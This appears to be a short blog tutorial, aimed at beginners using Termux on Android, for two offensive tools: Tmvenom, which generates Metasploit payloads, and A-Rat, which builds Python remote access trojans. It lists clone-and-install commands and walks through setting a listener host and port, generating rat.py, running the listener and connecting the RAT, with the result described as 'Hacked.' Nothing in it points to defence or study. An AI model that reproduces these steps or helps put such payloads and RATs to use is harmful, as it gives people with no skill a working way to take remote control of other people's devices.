Tmvenom
Tmvenom is a python based tool specially designed
for Termux users. This payload generates some basic
payloads using metasploit-framework. So you must
install metasploit framework on your Termux. This
tool works both rooted and non rooted devices. This is
very helpfull for beginners. This tool also guide you to
generate payloads easily
Requirments:-
Termux APp
metasploit-framework
Installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ git clone https://github.com/TechnicalMujeeb
/tmvenom
$ cd tmvenom
$ chmod +x *
$ sh install.sh
usage :
python2 tmvenom.py
Now select payload options and you can easily
generates payloads.
A-Rat
A-Rat = Remote access tool we can generate python
based rat
installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/Xi4u7/A-Rat
$ cd A-Rat
$ chmod +x *
usage :
$ python2 A-Rat.py
$ help
$ set host 127.0.0.1 [your ip]
$ set port 1337
$ set output /$HOME/rat.py
$ generate
It generates rat.py in termux home directory
Open termux new session
type $ ls
here you get that rat.py go to again A-Rat means
privious session of termux
Type run to start exploit.
$ run
and then open new session and run rat like this
$ python rat.py
and come back to A-Rat session now its connected to
that rat. means Hacked. Press control + c to stop.


0 Comments